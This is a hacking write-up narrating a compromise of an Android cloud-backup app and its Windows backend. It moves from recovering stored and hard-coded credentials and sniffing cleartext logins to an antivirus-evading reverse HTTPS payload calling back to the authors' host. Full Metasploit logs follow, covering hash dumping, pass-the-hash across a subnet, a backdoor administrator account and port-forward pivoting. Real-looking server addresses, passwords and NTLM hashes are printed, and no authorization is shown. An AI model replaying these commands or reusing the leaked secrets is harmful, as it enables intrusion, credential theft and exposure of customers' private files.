Mobile Application Hacking Diary Ep.1


######
 Info
######

Title   : Mobile Application Hacking Diary Ep.1
Author  : ZeQ3uL and diF
Team    : CWH Underground



##########
 Contents
##########

  [0x00] - Introduction

  [0x01] - Application Reconnaissance

        [0x01a] - Insecure Data Storage
        [0x01b] - Decompile Application Package
        
  [0x02] - Man in the Middle Attack 

        [0x02a] - Preparation Tools
        [0x02b] - MitM Attack

  [0x03] - Server-Side Attack

        [0x03a] - Scanning
        [0x03b] - Gaining Access
        [0x03c] - Bypass Anti-Virus
        [0x03d] - PWNed System !!
        [0x03e] - It's Not Over !!

  [0x04] - Greetz To


#######################
 [0x00] - Introduction
#######################

000000000000000000000000000000000000000000000000
00000000000000 00000000000000000 000000000000000            During the past few years, we've seen mobile devices evolve from simple,
000000000000000  00000000000000  000000000000000         rather dumb phones to complete, integrated communication devices.
000000000000000   00000000000   0000000000000000         As these devices became more intelligent ("smart" phones) and data
0000000000000000               00000000000000000         transfer speeds on mobile networks increased significantly, people no longer
00000000000000                   000000000000000         used them solely for making phone calls or sending text messages, but started
000000000000    000         000    0000000000000         using them for sending email, browsing the Internet, playing games, checking-in
00000000000     000         000     000000000000         for flights, or doing online banking transactions.
0000000000                           00000000000         
0000000000                           00000000000            Companies started creating mobile applications to offer all sorts of services to their
000000000000000000000000000000000000000000000000         clients. Today, mobile applications are available for storing and synchronizing data   
0000    00                            00    0000         files in the cloud, participating in social network sites, or even playing with a talking
000     00                            00     000         crazy frog.
000     00                            00     000         
000     00                            00     000            As the data that is stored, processed, and transferred by these applications can often
000     00                            00     000         be considered sensitive, it is important to ensure that the security controls on these mobile  
0000   000                            000   0000         devices and applications is effective.
0000000000                            0000000000         
000000000000000      000000     0000 00000000000         
000000000000000      000000     00000 0000000000         --SANS Penetration Testing Blog
000000000000000      000000     000000 000000000         
000000000000000000000000000000000000000000000000


        This papers is the narrative and the explanation of our penetration testing techniques from the real world as a case study of an Android application 
    testing (Android is a Linux-based platform developed by Google and the Open Handset Alliance. Application programming for it is done exclusively in Java. 
    The Android operating system software stack consists of Java applications running on a Dalvik virtual machine (DVK)). The main functions of this application 
    work similarly to the famous Apple's iCloud; backup picture, video, contact and sync to a personal cloud system.

    Let's Begin! :))


#####################################
 [0x01] - Application Reconnaissance
#####################################
    
        "Usually, a client software package is installed locally on the mobile device which acts as the front-end for the user. Packages are typically downloaded 
    from an app store or market, or provided via the company's website. Similar to non-mobile software, these applications can contain a myriad of vulnerabilities. 
    It is important to note that most testing on the client device usually requires a device that is rooted or jailbroken. For example, the authentic mobile OS 
    will most likely prevent you from having access to all files and folders on the local file system. Furthermore, as software packages can often be decompiled, 
    tampered with or reverse engineered, you may want to use a device that does not pose any restrictions on the software that you can install."

--SANS Penetration Testing Blog

        Our first mission is Application Reconnaissance. The objective of this mission is to understand how the application work, then try to enumerate sensitive information 
    from data stored in a local storage and to dig out even more information, application package will be decompiled into a form of source code. 

    
    +++++++++++++++++++++++++++++++++
     [0x01a] - Insecure Data Storage
    +++++++++++++++++++++++++++++++++

            We've started our first mission by creating an Android Pentest platform (Install Android SDK, Android Emulator and Burpsuite proxy) and get ready to 
        connect to our phone using Android Debug Bridge (http://developer.android.com/tools/help/adb.html) , ADB is a versatile command line tool that lets you
        communicate with an emulator instance or connected Android-powered device.

            First, we signed up and logged in to the application then used ADB to connect a phone with a debug mode and used "adb devices" command.

    ---------------------------------------------------------------
    [zeq3ul@12:03:51]-[~]> adb devices
    * daemon not running. starting it now *
    * daemon started successfully *
    List of devices attached
    3563772CF3BC00FH device
    ---------------------------------------------------------------
    
            "adb shell" command was the command we've used to connect to the phone in order to explore through the internal directory.

            Before we can do any further exploration, we need to identify real name of the application package which usually found in "/data/app/" folder in a 
        form of ".apk". 
            
            "/data/app/com.silentm.msec-v12.apk" was found to be a package of our target application so "com.silentm.msec-v12" is the real name of the package.
    
            Finally, folder belonging to the application in "/data/data" is most likely to be the place that sensitive information of the application are stored 
        locally. As expected, we found crucial information stored in "/data/data/com.silentm.msec-v12/shared_prefs" as below.

    ---------------------------------------------------------------
    [zeq3ul@12:05:24]-[~]> adb shell
    # cd /data/data/com.silentm.msec-v12/shared_prefs
    # cat PREFS.xml

    <?xml versions='1.0' encoding='utf-8' standalone='yes'?>
    <map>
    <string name="Last_added">9</string>
    <boolean name"configured" value="true"/>
    <string name="package">Trial</string>
    <string name="version">1.2</string>
    <string name="username">zeq3ul</string>
    <string name="password">NXBsdXM0PTEw</string>
    <string name="number">089383933283</string>
    <string name="supportedextension">{&quote;D&quote;:&quote;HTML,XLS,XLSX,XML,TXT,DOC,DOCX,PPT,PDF,ISO,ZIP,RAR,RTF&quote;,&quote;M&quote;:
    &quote;MP3,MP2,WMA,AMR,WAV,OGG,MMF,AC3&quote;,&quote;I&quote;:&quote;JPEG,JPG,GIF,BMP,PNG,TIFF&quote;,&quote;V&quote;:&quote;3GP,MP4,MPEG,
    WMA,MOV,FLV,MKV,MPEG4,AVI,DivX&quote;}</string>
    ...
    </map>    
    ---------------------------------------------------------------

            We've found our username and password stored locally in PREFS.xml, but password seems to be encrypted with some kind of encyption but if we take a 
        good look into it you will found it was only base64 encoded string, so we can easily decoded it to reveal a real password. "NXBsdXM0PTEw" > "5plus4=10"

            TIPS! This is a bad example of how applications store sensitive data and also the encoding with Base64 (Encode != Encrypt) is such a bad idea of 
        storing a password too. Example for bad code shown below:

    ---------------------------------------------------------------
    public void saveCredentials(String userName,String password)
    {
    SharedPreferences PREFS;
    PREFS=getSharedPreferences(MYPREFS,Activity.MODE_PRIVATE);
    SharedPreferences.Editor editor = PREFS.edit();
    String mypassword = password;
    String base64password = new String(Base64.encodeToString(mypassword.getBytes(),4)); 
    editor.putString("Username", userName);
    editor.putString("Password", base64password);
    editor.commit();        
    }
    ---------------------------------------------------------------

    
    +++++++++++++++++++++++++++++++++++++++++
     [0x01b] - Decompile Application Package
    +++++++++++++++++++++++++++++++++++++++++   

            Next, in order to completely understand the mechanism of the application, we need to obtain the source code of the application. For Android 
        application, this can be done by decompiling the Android Package (".apk") of the application.
        
            Android packages (".apk" files) are actually simply ZIP files. They contain the AndroidManifest.xml, classes.dex, resources.arsc, among other 
        components. You can rename the extension and open it with a ZIP utility such as WinZip to view its contents.
    
            We've started with "adb pull" command to extract android application from mobile phone.

    ---------------------------------------------------------------
    [zeq3ul@12:08:37]-[~]> adb pull /data/app/com.silentm.msec-v12.apk
    1872 KB/s (5489772 bytes in 2.862s)
    ---------------------------------------------------------------

            The next step is to decompile ".apk" we've just got using the tools called dex2jar (http://code.google.com/p/dex2jar/). dex2jar is intended to 
        convert ".dex" files to human readable ".class" files in java.

            NOTICE! "class.dex" is stored in every ".apk" as mentioned above. This can be proved by changing any ".apk" to ".zip" and extracting it then you 
        will find out about the structure of an ".apk"

    ---------------------------------------------------------------
    [zeq3ul@12:09:11]-[~]> bash dex2jar.sh com.silentm.msec-v12.apk
    dex2jar version: translator-0.0.9.8
    dex2jar com.silentm.msec-v12.apk -> com.silentm.msec-v12_dex2jar.jar
    Done.
    ---------------------------------------------------------------

            JD-GUI (http://java.decompiler.free.fr/?q=jdgui) is our tool of choice to read a decompiled source (".jar" from dex2jar). In this case 
        is "com.silentm.msec-v12_dex2jar.jar"

            NOTE: JD-GUI is a standalone graphical utility that displays Java source codes of “.class” files. You can browse the reconstructed source code 
        with the JD-GUI for instant access to methods and fields. 

            As a result, We found that "Config.class" stored smelly information (hard-coded) the source as shown below:

    Config.class

    ---------------------------------------------------------------
    package com.silentm.msec;

    public class Config
    {
    public static final String CONTACT_URL = "http://203.60.240.180/en/Contact.aspx";
    public static final String Check_Memory = "http://203.60.240.180/en/CheckMem.aspx";
    public static final String BackupSMS = "http://203.60.240.180/en/backupsms.aspx";
    public static final String Forgot_Password = "http://203.60.240.180/en/ForgotPassword.aspx";
    public static final String FTP_URL = "203.60.240.183";
    public static final String FTP_User = "msec1s";
    public static final String FTP_Password = "S1lentM!@#$ec";
    public static final String Profile = "http://203.60.240.180/en/Profile.aspx";
    public static final int MAX_MEMORY = 500;
    public static final int LOG_COUNT = 30;
    ...
    }
    ---------------------------------------------------------------

            Explain!! backup URL and FTP user and password was found in the source code (W00T W00T !!). Now we know that this application use FTP protocol to 
        transfer picture, SMS, contact information to cloud server and it's SUCK!! because it's hard-coded and FTP is not a secure protocol.

        
###################################
 [0x02] - Man in the Middle Attack
###################################

        "The second attack surface is the communications channel between the client and the server. Although applications use more and more secured communications 
    for sending sensitive data, this is not always the case. In your testing infrastructure, you will want to include an HTTP manipulation proxy to intercept and alter traffic. 
    If the application does not use the HTTP protocol for its communication, you can use a transparent TCP and UDP proxy like the Mallory tool. By using a proxy, you can intercept, 
    analyze, and modify data that is communicated between the client and the server."

--SANS Penetration Testing Blog

        As we found that our target application use HTTP protocol, the next step is to setup a HTTP intercepting proxy tools such as ZapProxy or Burpsuite (Burpsuite was chosen this time) 
    in order to perform our second misson, Man in the Middle attack, agaist the application. Having a web proxy intercepting requests is a key piece of the puzzle. From this point forward, 
    our test will use similar technique to that of regular web applications testing.

        We've tried to intercepted every HTTP requests and response on application with Burpsuite Proxy (http://www.portswigger.net/burp/). For HTTP request, we found sensitive information 
    (username and password) sent to server-side because it use HTTP protocol that sent packet in clear text while performing log in shown below (anyone in the middle of this communication 
    will see those information crystal clear, what a kind App!).

    
    Burpsuite: HTTP Request

    ---------------------------------------------------------------
    POST http://203.60.240.180/en/GetInfo.aspx HTTP/1.1
    Content-Length: 56
    Content-Type: application/x-www-form-urlencoded
    Host: 203.60.240.180
    Connection: Keep-Alive
    User-Agent: Apache-HttpClient/UNAVAILABLE   (java 1.4)

    imei=352489051163052&username=zeq3ul&password=5plus4=10
    ---------------------------------------------------------------

        Moreover, on HTTP response, We found the information that surprise us; email and password for Gmail of someone (we found out latter that was an administrator email) 
    was shown in front of our eyes!.


    Burpsuite: HTTP Response

    ---------------------------------------------------------------
    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/html; charset=utf=8
    Server: Microsoft-IIS/7.0
    X-AspNet-Version: 2.0.50727
    X-Powered-By: ASP.NET
    Date: Fri, 07 June 2013 12:15:37 GMT
    Content-Length: 2405

    {"AppVersion":"1.2","FTP_USER":"msec1s","FTP_PASS":"S1lentM!@#$ec","FTP_SERVER":"203.60.240.183","MAX_MEMORY":"500","LOG_COUNT":"30",
    "Smtp":"smtp.gmail.com","FromEmail":"mseccloud@gmail.com","FromEmailPwd":"M[Sec)0/",................
    ---------------------------------------------------------------

        As a result, We were able to sniff username and password in clear text (no SSL nor encryption) and compromise the email of an administrator 
    using email "mseccloud@gmail.com" and password "M[Sec)0/" that they gave us for free via HTTP reponse. :\


#############################  
 [0x03] - Server-Side Attack
#############################
        
        "In most cases, the server to which the client communicates is one or more web servers. The attack vectors for the web servers behind a mobile application 
    is similar to those we use for regular web sites. Aside from looking for vulnerabilities in the web application, you should also perform host and service scans 
    on the target system(s) to identify running services, followed by a vulnerability scan to identify potential vulnerabilities, provided that such testing is allowed 
    within the scope of the assignment."

--SANS Penetration Testing Blog


    ++++++++++++++++++++
     [0x03a] - Scanning 
    ++++++++++++++++++++

            As we've found backend URL (203.60.240.180 and 203.60.240.183) from the source code, we need to check the security of the backend system as well. 
        We've started by scanning target for open ports by using nmap (http://nmap.org).
    
    
    Nmap Result for 203.60.240.180
    ---------------------------------------------------------------
    [zeq3ul@12:30:54]-[~]> nmap -sV -PN 203.60.240.180

    Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-07 12:31 ICT
    Nmap scan report for 203.60.240.180
    Host is up (0.0047s latency).
    Not shown: 998 filtered ports
    PORT     STATE SERVICE  VERSION
    80/tcp   open  http     Microsoft IIS httpd 7.0
    443/tcp  open  ssl/http Microsoft IIS httpd 7.0
    3389/tcp open  ms-wbt-server?   
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
    
    Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 21.99 seconds
    ---------------------------------------------------------------

    
    Nmap Result for 203.60.240.183
    ---------------------------------------------------------------
    [zeq3ul@12:35:12]-[~]> nmap -sV -PN 203.60.240.183

    Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-07 12:35 ICT
    Nmap scan report for 203.60.240.183
    Host is up (0.0036s latency).
    Not shown: 997 filtered ports
    PORT     STATE SERVICE  VERSION
    21/tcp   open  ftp  Microsoft ftpd  
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
    
    Service detection performed. Please report any incorrect results at http://nmap.org/submit/.
    Nmap done: 1 IP address (1 host up) scanned in 16.38 seconds
    ---------------------------------------------------------------
        
            From the scan result, we got a list of opening ports and we've found that there were IIS and Terminal Service running on 203.60.240.180 
        and FTP running on 203.60.240.183; It's time to grab low-hanging fruits.
        
        
    ++++++++++++++++++++++++++
     [0x03b] - Gaining Access
    ++++++++++++++++++++++++++

            As we found FTP username and password from the source code ("msec1s","S1lentM!@#$ec"). We were able to access to FTP service running on the server as shown below:

    FTP Server: 203.60.240.183
    ---------------------------------------------------------------
    [zeq3ul@12:40:12]-[~]> ftp 203.60.240.183
    Connected to 203.60.140.183
    220 Microsoft FTP Service
    User <203.60.140.183:<none>>: msec1s
    331 Password required
    Password:
    230 User logged in.
    ftp> pwd
    257 "/" is current directory.
    ftp>
    ---------------------------------------------------------------
        
            Now that we've compromised FTP Server using account "msec1s". We were able to access all customer contact, picture, video, Etc. Excitedly, we expected to find some "INTERESTING" picture 
        or Clip video; BUT we found DICK! WTF!! so we got shock and stop searching. OTL
     _____________________________________________________________ 
    | NO DICK  NO DICK  NO DICK  NO DICK  NO DICK       ^^^^^^^^\ |
    | NO DICK  NO DICK  NO DICK  NO DICK  NO DICK       |       | |
    | NO DICK  NO DICK  NO DICK  NO DICK  NO DICK       |_ __   | |
    | NO DICK  NO DICK  NO DICK  NO DICK  NO DICK       (.(. )  | |
    | NO DICK  NO DICK  NO DICK  NO DICK  NO DI _       (_      ) |
    |                                           \\      /___/' /  |
    |                                           _\\_      \    |  |
    |                                          ((   )     /====|  |
    |                                           \  <.__._-      \ |
    |___________________________________________ <//___.         ||      

            Moving to our next target, 203.60.240.180, we've tried to access target via Terminal Service. Luckily, we were able to access target server using the same username and password from FTP Server 
        ("msec1s","S1lentM!@#$ec"). Yummy!
        
    Remote Desktop with rdesktop
    ---------------------------------------------------------------
    [zeq3ul@12:56:04]-[~]> rdesktop -u msec1s -p S1lentM!@#$ec 203.60.240.180
    ---------------------------------------------------------------

            Moreover, "msecls" account was in an administrator privileges group. OWNAGED!

    +++++++++++++++++++++++++++++
     [0x03c] - Bypass Anti-virus
    +++++++++++++++++++++++++++++

            Many Anti-Virus programs work by pattern or signature matching. If any program look like malware by its appearance, the AV will catch it. If the malicious file 
        has a signature that the AV do not know, AV are most likely to identify those file as clean and unharmed.

            "Veil, a new payload generator created by security expert and Blackhat USA class instructor Chris Truncer, does just that."
        -- https://www.christophertruncer.com/veil-a-payload-generator-to-bypass-antivirus/

            Simply pick payload and use msfveom shellcode, chose reverse HTTPS to our web server (cwh.dyndns.org) by following command:

    ---------------------------------------------------------------
    ========================================================================
    Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
    ========================================================================
    
    [?] Use msfvenom or supply custom shellcode?

    1 - msfvenom (default)
    2 - Custom

    [>] Please enter the number of your choice: 1

    [?] What type of payload would you like?

    1 - Reverse TCP
    2 - Reverse HTTP
    3 - Reverse HTTPS
    0 - Main Menu

    >] Please enter the number of your choice: 3
    [?] What's the Local Host IP Address: cwh.dyndns.org
    [?] What's the Local Port Number: 443
    ---------------------------------------------------------------

            Now we've got payload.exe file, When any Windows system execute this .exe, they will try to connect to the our server immediately.
    
    
    +++++++++++++++++++++++++++
     [0x03d] - PWNED System !!
    +++++++++++++++++++++++++++

            Time to PWN! As the target server (203.60.140.180) can be access using MSRDP Service (on port 3389) + it has access to the internet, we can just open 
        the web server on our machine and then remote (via MSRDP) to the server to download and get our payload (payload.exe) executed. Executed Metasploit payload 
        (payload.exe) will connect a meterpreter payload back (reverse_https) to our server (cwh.dyndns.org).

            After that, we used hashdump to get LM/NTLM hash on server but this cannot be done yet because if you are on a x64 box and meterpreter isn't running in a x64 process, 
        it will fail saying that it doesn't have the correct version offsets (x64 system and Meterpreter is x86/win32). So we need to find a good process to migrate into and 
        kick it from there. In this case we migrate our process to Winlogon process which running as x64 box. 

            Our console will have a log like this.

    ---------------------------------------------------------------
    [zeq3ul@13:16:14]-[~]> sudo msfconsole 
    [sudo] password for zeq3ul: 
    Call trans opt: received. 2-19-98 13:18:48 REC:Loc

        Trace program: running

            wake up, Neo...
            the matrix has you
        follow the white rabbit.
    
            knock, knock, Neo.
    
                            (`.         ,-,
                            ` `.    ,;' /
                            `.  ,'/ .'
                            `. X /.'
                    .-;--''--.._` ` (
                .'            /   `
                ,           ` '   Q '
                ,         ,   `._    \
            ,.|         '     `-.;_'
            :  . `  ;    `  ` --,.._;
            ' `    ,   )   .'
                `._ ,  '   /_
                    ; ,''-,;' ``-
                    ``-..__``--`
    
                                http://metasploit.pro
    
    
        =[ metasploit v4.6.2-1 [core:4.6 api:1.0]
    + -- --=[ 1113 exploits - 701 auxiliary - 192 post
    + -- --=[ 300 payloads - 29 encoders - 8 nops
    
    msf > use exploit/multi/handler 
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
    PAYLOAD => windows/meterpreter/reverse_https
    msf exploit(handler) > set LPORT 443
    LPORT => 443
    msf exploit(handler) > set LHOST cwh.dyndns.org
    LHOST => cwh.dyndns.org
    msf exploit(handler) > set ExitOnSession false
    ExitOnSession => false
    msf exploit(handler) > exploit -j
    [*] Exploit running as background job.
    
    [*] Started HTTPS reverse handler on https://cwh.dyndns.org:443/
    msf exploit(handler) > [*] Starting the payload handler...
    [*] 203.60.240.180:49160 Request received for /oOTJ...
    [*] 203.60.240.180:49160 Staging connection for target /oOTJ received...
    [*] Patched user-agent at offset 640488...
    [*] Patched transport at offset 640148...
    [*] Patched URL at offset 640216...
    [*] Patched Expiration Timeout at offset 640748...
    [*] Patched Communication Timeout at offset 640752...
    [*] Meterpreter session 1 opened (cwh.dyndns.org:443 -> 203.60.240.180:49160) at 2013-06-07 13:25:17 +0700
    sessions -l
    
    Active sessions
    ===============
    
    Id  Type                   Information                                      Connection
    --  ----                   -----------                                      ----------
    1   meterpreter x86/win32  WIN-UUOFVQRLB13\msec1s @ WIN-UUOFVQRLB13  cwh.dyndns.org:443 -> 203.60.240.180:49160 (203.60.240.180)
    
    msf exploit(handler) > sessions -i 1
    [*] Starting interaction with 1...
    
    meterpreter > sysinfo
    Computer        : WIN-UUOFVQRLB13
    OS              : Windows 2008 R2 (Build 7600).
    Architecture    : x64 (Current Process is WOW64)
    System Language : en_US
    Meterpreter     : x86/win32
    
    
    meterpreter > ps -S winlogon
    Filtering on process name...
    
    Process List
    ============
    
    PID  PPID  Name          Arch    Session  User                 Path
    ---  ----  ----          ----    -------  ----                 ----
    384  340   winlogon.exe  x86_64  1        NT AUTHORITY\SYSTEM  C:\Windows\System32\winlogon.exe
    
    
    meterpreter > migrate 384
    [*] Migrating from 1096 to 384...
    [*] Migration completed successfully.
    meterpreter > sysinfo
    Computer        : WIN-UUOFVQRLB13
    OS              : Windows 2008 R2 (Build 7600).
    Architecture    : x64
    System Language : en_US
    Meterpreter     : x64/win64
    meterpreter > run hashdump 
    [*] Obtaining the boot key...
    [*] Calculating the hboot key using SYSKEY c6b1281c29c15b25cfa14495b66ea816...
    [*] Obtaining the user list and keys...
    [*] Decrypting user keys...
    [*] Dumping password hints...
    
    No users with password hints on this system
    
    [*] Dumping password hashes...
    
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    msec1s:1000:aad3b435b51404eeaad3b435b51404ee:73778dadcbb3fbd800e5bb383d5ec1e3:::
    ---------------------------------------------------------------

            Now we got LM/NTLM hash for our target (203.60.240.180).    

            
    ++++++++++++++++++++++++++
     [0x03e] - It's Not Over
    ++++++++++++++++++++++++++
                    
            
            [ O ]                                                
             \ \      p         Let's move on the our final mission.
              \ \  \o/                     
               \ \--'---_                                       
               /\ \   / ~~\_                                    
         ./---/__|=/_/------//~~~\                              
         /___________________/O   O \                            
        (===(\_________(===(Oo o o O)                         
         \~~~\____/     \---\Oo__o--                            
           ~~~~~~~       ~~~~~~~~~~  

            In common case, a next thing to do is to begin to crack the hashes we've got for later use. There are many caveats to cracking Windows hashes and it does take some time 
        so you might as well begin this process ASAP right?
 
            However, there is often no reason to spend time/cycles cracking hashes when you can "PASS THE HASH".
    
            One of the most common way to "pass the hash" is by using the PSEXEC module (exploit/windows/smb/psexec) in Metasploit. This module executes an arbitrary payload by authenticating 
        to Windows SMB using administrative credentials (password or hash), and creating a Windows service. This is a pretty powerful module on most pen-test tools, once you get to the point of dumping 
        hashes on a Windows machine.

            "Once you use it successfully it will become very apparent that this power could be multiplied by several orders of magnitude if someone wrote a scanning-capable version that accepts an RHOSTS option 
        rather than a single RHOST. Apparently that's what Carlos Perez thought when he wrote psexec_scanner"

    -- http://www.darkoperator.com/blog/2011/12/16/psexec-scanner-auxiliary-module.html

    
    ---------------------------------------------------------------
    meterpreter > background
    [*] Backgrounding session 1...
    msf exploit(handler) > use auxiliary/scanner/smb/psexec_scanner
    msf auxiliary(psexec_scanner) > show options 
    
    Module options (auxiliary/scanner/smb/psexec_scanner):
    
    Name       Current Setting                                                    Required  Description
    ----       ---------------                                                    --------  -----------
    HANDLER    true                                                               no        Start an Exploit Multi Handler to receive the connection
    LHOST                                                                         yes       Local Hosts for payload to connect.
    LPORT                                                                     yes       Local Port for payload to connect.
    OPTIONS                                                                       no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
    PAYLOAD    windows/meterpreter/reverse_tcp                                    yes       Payload to use against Windows host
    RHOSTS                                                                yes       Range of hosts to scan.
    SHARE      ADMIN$                                                             yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
    SMBDomain  WORKGROUP                                                          yes       SMB Domain
    SMBPass                                       no        SMB Password
    SMBUser                                                               no        SMB Username
    THREADS                                                                   yes       The number of concurrent threads
    TYPE       manual                                                             no        Type of credentials to use, manual for provided one, db for those found on the database (accepted: db, manual)
    
    msf auxiliary(psexec_scanner) > set LHOST cwh.dyndns.org
    LHOST => cwh.dyndns.org
    msf auxiliary(psexec_scanner) > set LPORT 8443
    LPORT => 8443
    msf auxiliary(psexec_scanner) > set RHOSTS 203.60.240.0/24
    RHOSTS => 203.60.240.0/24
    msf auxiliary(psexec_scanner) > set SMBUser administrator
    SMBUser => administrator
    msf auxiliary(psexec_scanner) > set SMBPass aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72
    SMBPass => aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72
    msf auxiliary(psexec_scanner) > set THREADS 10
    THREADS => 10
    msf auxiliary(psexec_scanner) > exploit
    
    [*] Using the username and password provided
    [*] Starting exploit multi handler
    [*] Started reverse handler on cwh.dyndns.org:8443 
    [*] Starting the payload handler...
    [*] Scanned 031 of 256 hosts (012% complete)
    [*] Scanned 052 of 256 hosts (020% complete)
    [*] Scanned 077 of 256 hosts (030% complete)
    [*] Scanned 111 of 256 hosts (043% complete)
    [*] Scanned 129 of 256 hosts (050% complete)
    [*] Scanned 154 of 256 hosts (060% complete)
    [*] 203.60.240.165:445 - TCP OPEN
    [*] Trying administrator:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72
    [*] 203.60.240.180:445 - TCP OPEN
    [*] Trying administrator:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72
    [*] Connecting to the server...
    [*] Authenticating to 203.60.240.165:445|WORKGROUP as user 'administrator'...
    [*] Connecting to the server...
    [*] Authenticating to 203.60.240.180:445|WORKGROUP as user 'administrator'...
    [*] Uploading payload...
    [*] Uploading payload...
    [*] Created \ExigHylG.exe...
    [*] Created \xMhdkXDt.exe...
    [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.180[\svcctl] ...
    [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.165[\svcctl] ...
    [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.180[\svcctl] ...
    [*] Obtaining a service manager handle...
    [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.165[\svcctl] ...
    [*] Obtaining a service manager handle...
    [*] Creating a new service (ZHBMTKgE - "MgHtGamQQzIQxKDJsGWvcgiAStFttWMt")...
    [*] Creating a new service (qJTBfPjT - "MhIpwSR")...
    [*] Closing service handle...
    [*] Closing service handle...
    [*] Opening service...
    [*] Opening service...
    [*] Starting the service...
    [*] Starting the service...
    [*] Removing the service...
    [*] Removing the service...
    [*] Sending stage (751104 bytes) to 203.60.240.180
    [*] Closing service handle...
    [*] Closing service handle...
    [*] Deleting \xMhdkXDt.exe...
    [*] Deleting \ExigHylG.exe...
    [*] Meterpreter session 2 opened (cwh.dyndns.org:8443 -> 203.60.240.180:49161) at 2013-07-02 13:40:42 +0700
    [*] Sending stage (751104 bytes) to 203.60.240.165
    [*] Meterpreter session 3 opened (cwh.dyndns.org:8443 -> 203.60.240.165:50181) at 2013-07-02 13:42:06 +0700
    [*] Scanned 181 of 256 hosts (070% complete)
    [*] Scanned 205 of 256 hosts (080% complete)
    [*] Scanned 232 of 256 hosts (090% complete)
    [*] Scanned 256 of 256 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf auxiliary(psexec_scanner) > sessions -l
    
    Active sessions
    ===============
    
    Id  Type                   Information                               Connection
    --  ----                   -----------                               ----------
    1   meterpreter x86/win32  WIN-UUOFVQRLB13\msec1s @ WIN-UUOFVQRLB13  cwh.dyndns.org:443 -> 203.60.240.180:49160 (203.60.240.180)
    2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN-UUOFVQRLB13     cwh.dyndns.org:8443 -> 203.60.240.180:49161 (203.60.240.180)
    3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN-HDO6QC2QVIV     cwh.dyndns.org:8443 -> 203.60.240.165:50181 (203.60.240.165)
    
    msf auxiliary(psexec_scanner) > sessions -i 3
    [*] Starting interaction with 3...
    
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter > sysinfo
    Computer        : WIN-HDO6QC2QVIV
    OS              : Windows 2008 R2 (Build 7600).
    Architecture    : x64 (Current Process is WOW64)
    System Language : en_US
    Meterpreter     : x86/win32
    
    meterpreter > shell
    Process 2568 created.
    Channel 1 created.
    Microsoft Windows [Version 6.1.7600]
    Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
    
    C:\Windows\system32>net user cwh 5plus4=10 /add
    net user cwh 5plus4=10 /add
    The command completed successfully.
    
    
    C:\Windows\system32>net localgroup administrators cwh /add
    net localgroup administrators cwh /add
    The command completed successfully.
    
    
    C:\Windows\system32>exit
    ---------------------------------------------------------------

            So we were able to compromise another machine (203.60.240.165).

            We typed "netstat -an" to view open ports on the target and found that Remote Desktop (MSRDP on port 3389) opened but we cannot directly remote to the target
        because the port was filtered by firewall. But there is the way to bypass this control. 

            We used "portfwd" command from the Meterpreter shell. Portfwd is most commonly used as a pivoting technique to allow direct access to machines otherwise inaccessible 
        from the attacking system. Running this command on the compromised host with access to both the attacker and destination network (or system), we can essentially forward 
        TCP connections through this machine effectively making it a pivot point much like the port forwarding technique used with an ssh connection, portfwd will relay TCP connections to and from the connected machines.

    ---------------------------------------------------------------
    meterpreter > portfwd add -l 3389 -r 127.0.0.1 -p 3389
    [*] Local TCP relay created: 0.0.0.0:3389 <-> 127.0.0.1:3389
    ---------------------------------------------------------------

            Lastly, we used rdesktop to connect to machine target server (203.60.240.165) with following command.

    ---------------------------------------------------------------
    [zeq3ul@14:02:51]-[~]> rdesktop -u cwh -p 5plus4=10 localhost
    ---------------------------------------------------------------
    
            FULLY COMPROMISED!! GGWP!

            
####################
 [0x04] - Greetz To
####################
    
Greetz      :  ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2, diF, MaYaSeVeN
Special Thx :  Exploit-db.com
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s